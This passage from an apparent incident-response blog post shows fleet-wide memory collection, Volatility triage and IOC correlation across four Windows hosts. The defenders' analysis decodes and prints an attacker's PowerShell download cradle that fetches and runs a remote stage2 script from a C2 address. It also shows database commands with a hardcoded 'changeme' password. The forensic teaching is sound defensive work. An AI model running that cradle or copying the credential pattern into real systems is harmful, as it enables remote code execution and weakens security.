The decision is made to collect memory from all four systems before any containment action that might destroy volatile evidence.<\/p>\n<pre>## Step 1: Run the network impact assessment before starting anything\n\npython3 \/srv\/memory\/network_impact.py &lt;&lt; &#039;EOF&#039;\nendpoints = {\n    &quot;dc01_64gb&quot;:           {&quot;count&quot;: 1, &quot;ram_gb&quot;: 64, &quot;compression_ratio&quot;: 0.60},\n    &quot;finance_workstations&quot;: {&quot;count&quot;: 3, &quot;ram_gb&quot;: 16, &quot;compression_ratio&quot;: 0.65},\n}\nlink_speed_mbps  = 1000\nmax_utilisation  = 0.30\nEOF\n\n## Output:\n## dc01_64gb:\n##   Compressed size: ~38.4 GB per image\n##   Transfer time:   ~17.1 minutes per host at 30% link\n## finance_workstations:\n##   Compressed size: ~10.4 GB per image\n##   Transfer time:   ~4.6 minutes per host at 30% link\n##\n## Total data volume:   69.6 GB\n## Recommended max concurrent collections: 3 endpoints\n## Total sequential time: ~33 minutes<\/pre>\n<pre>## Step 2: Launch tiered collection\n## DC01 goes first (tier 1) at higher throttle\n## Workstations collect in parallel (tier 3)\n\npython3 \/srv\/memory\/collection_orchestrator.py \\\n    --config \/etc\/velociraptor\/server.config.yaml &lt;&lt; &#039;EOF&#039;\ntargets = [\n    CollectionTarget(&quot;DC01&quot;,           &quot;C.abc123&quot;, tier=1, ram_gb=64, priority_ioc=True),\n    CollectionTarget(&quot;WS-FINANCE-01&quot;,  &quot;C.def456&quot;, tier=3, ram_gb=16, priority_ioc=True),\n    CollectionTarget(&quot;WS-FINANCE-02&quot;,  &quot;C.ghi789&quot;, tier=3, ram_gb=16),\n    CollectionTarget(&quot;WS-FINANCE-03&quot;,  &quot;C.jkl012&quot;, tier=3, ram_gb=16),\n]\nEOF\n\n## Collection log output:\n## 07:16:01 Starting Tier 1: DCs and critical servers\n## 07:16:02   Started: DC01 (hunt: H.001)\n## 07:33:14   Completed: DC01 (17.2 min)\n## 07:33:15 Starting Tier 3: Workstations\n## 07:33:16   Started: WS-FINANCE-01 (hunt: H.002)\n## 07:33:16   Started: WS-FINANCE-02 (hunt: 
H.003)\n## 07:33:16   Started: WS-FINANCE-03 (hunt: H.004)\n## 07:38:01   Completed: WS-FINANCE-01 (4.7 min)\n## 07:38:22   Completed: WS-FINANCE-02 (5.1 min)\n## 07:39:05   Completed: WS-FINANCE-03 (5.8 min)\n## 07:39:05 Tier 3 complete\n## Campaign complete: 4\/4 collected in 23.1 min<\/pre>\n<pre>## Step 3: Pipeline auto-processes images as they land\n## Watch the processing in real time\n\nwatch -n 10 'psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -c \"SELECT hostname, status, risk_score,\n               suspicious_process_count, has_malfind\n        FROM memory_images mi\n        LEFT JOIN triage_results tr ON tr.image_id = mi.id\n        ORDER BY received_at;\"'\n\n## By 07:52 UTC (36 min after collection started) all four are complete:\n##\n## hostname       | status   | risk_score | susp_procs | malfind\n## ---------------+----------+------------+------------+--------\n## DC01           | complete |         85 |          3 | t\n## WS-FINANCE-01  | complete |         70 |          2 | t\n## WS-FINANCE-02  | complete |         20 |          1 | f\n## WS-FINANCE-03  | complete |          5 |          0 | f<\/pre>\n<pre>## Step 4: Slack alert fires at 07:38 when WS-FINANCE-01 completes\n##\n## :rotating_light: Memory Analysis Alert: WS-FINANCE-01\n## Risk Level:   HIGH\n## Risk Score:   70\n## Malfind:      YES :red_circle:\n## IOCs Found:   4\n## Susp. 
Procs:  2\n##\n## Top IOCs:\n##   ip_address: 185.220.101.47    (port 443)\n##   url: https:\/\/185.220.101.47\/submit.php\n##   url: https:\/\/185.220.101.47\/stage2.ps1\n##\n## At 07:41 PagerDuty fires when DC01 completes with CRITICAL risk score 85<\/pre>\n<pre>## Step 5: Run fleet correlation\npython3 \/srv\/memory\/cross_correlation.py\n\n## Output:\n## SHARED C2 IPs DETECTED across 1 IP:\n##   185.220.101.47:443 on 2 hosts: ['DC01', 'WS-FINANCE-01']\n##\n## Shared injection patterns: 2 hosts have EXECUTE_READ_WRITE anonymous regions\n## Lateral movement indicators:\n##   powershell.exe on WS-FINANCE-01 at 06:52:14\n##   powershell.exe on DC01           at 06:58:33  (6 min later)\n##   powershell.exe on WS-FINANCE-02  at 07:03:11  (5 min later)<\/pre>\n<pre>## Step 6: Deep dive DC01 - the most critical finding\n## Get the image path and run additional plugins\n## (-At gives unaligned, tuples-only output, so the value carries no padding)\n\nDC01_IMAGE=$(psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -At -c \"SELECT image_path FROM memory_images WHERE hostname='DC01';\")\n\nsource \/opt\/vol3-env\/bin\/activate\n\n# Get command lines for the 3 suspicious processes\nvol -f \"$DC01_IMAGE\" windows.cmdline | grep -A1 \"powershell\\|cmd\\|mshta\" | head -30\n\n## Output shows:\n## PID 4892 - C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n##   CommandLine: powershell.exe -NonInteractive -NoProfile -enc SQBFAFgA...\n##\n## Decode it (-enc takes base64 of UTF-16LE text):\necho \"SQBFAFgA...\" | base64 -d | iconv -f utf-16le -t utf-8\n## IEX (New-Object Net.WebClient).DownloadString('https:\/\/185.220.101.47\/stage2.ps1')\n\n# Dump the VAD region that malfind flagged as injected code\nMALFIND_ADDR=$(psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -At -c \"SELECT vad_start FROM malfind_results\n           WHERE image_id=(SELECT id FROM memory_images WHERE hostname='DC01')\n           AND risk_level='CRITICAL' LIMIT 1;\")\n\n# windows.vadinfo --address (must be a VAD start address) --dump writes that region\n# to the -o directory; -o is a global option, so it goes before the plugin name\nvol -f \"$DC01_IMAGE\" -o \/srv\/memory\/reports\/DC01\/ \\\n    windows.vadinfo --pid 4892 --address \"$MALFIND_ADDR\" --dump
\n\n# Run Yara against the dumped region\nyara \/srv\/memory\/yara_rules\/combined.yar \/srv\/memory\/reports\/DC01\/*.dmp\n## CobaltStrike_Beacon_Config_Decoded \/srv\/memory\/reports\/DC01\/pid.4892.vad.&lt;start&gt;-&lt;end&gt;.dmp<\/pre>\n<pre>## Step 7: Analyst conclusion and IOC extraction for blocking\n\npython3 \/srv\/memory\/cross_correlation.py &gt; \/srv\/memory\/reports\/fleet_final.json\n\n# Extract all IOCs for firewall\/EDR blocking, most widespread first\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT ioc_type, ioc_value, COUNT(DISTINCT image_id) AS host_count\nFROM iocs_extracted\nGROUP BY ioc_type, ioc_value\nORDER BY host_count DESC, ioc_type;\" | tee \/srv\/memory\/reports\/iocs_for_blocking.txt\n\n## ioc_type    | ioc_value           | host_count\n## ------------+---------------------+-----------\n## ip_address  | 185.220.101.47      | 2\n## url         | ...\/submit.php      | 2\n## url         | ...\/stage2.ps1      | 1\n\n## Timeline: 07:15 alert -&gt; 07:39 all images collected -&gt; 07:52 all processed\n## -&gt; 07:55 fleet correlation complete -&gt; 08:05 IOCs extracted for blocking\n## Total: 50 minutes from alert to actionable IOCs from memory analysis of 4 hosts<\/pre>\n<p>The complete timeline from initial alert to actionable intelligence was 50 minutes for four endpoints. The network impact across the collection phase stayed below 28% of the available 1Gbps link. The pipeline processed all four images automatically without analyst intervention beyond launching the collection campaign and reviewing the dashboard. 
The Slack and PagerDuty alerts fired as each high-risk image finished processing, so analysts were already reviewing DC01&#8217;s results while WS-FINANCE-02 and WS-FINANCE-03 were still being processed.<\/p>\n<p>The key finding that would not have been available from event log analysis alone: the base64-encoded PowerShell command in DC01&#8217;s process memory decoded to the exact C2 URL, which was then cross-correlated across all four images to show that WS-FINANCE-01 had contacted the same infrastructure six minutes before the first event log entry appeared on DC01. Memory forensics surfaced an indicator of compromise six minutes earlier than the event log did, because process memory captured the in-flight download cradle before the connection appeared in any log.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A complete guide to collecting and analysing memory from dozens of Windows endpoints simultaneously. Covers Velociraptor fleet collection with network-aware throttling, tiered collection strategies to protect production infrastructure, an automated Volatility 3 processing pipeline with Docker and Celery, IOC extraction, and analyst-ready reporting. 
Includes all helper scripts and pipeline code.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,13],"tags":[],"class_list":["post-362","post","type-post","status-publish","format-standard","hentry","category-dfir","category-threat-hunting"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/362","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=362"}],"version-history":[{"count":2,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/362\/revisions"}],"predecessor-version":[{"id":364,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/362\/revisions\/364"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}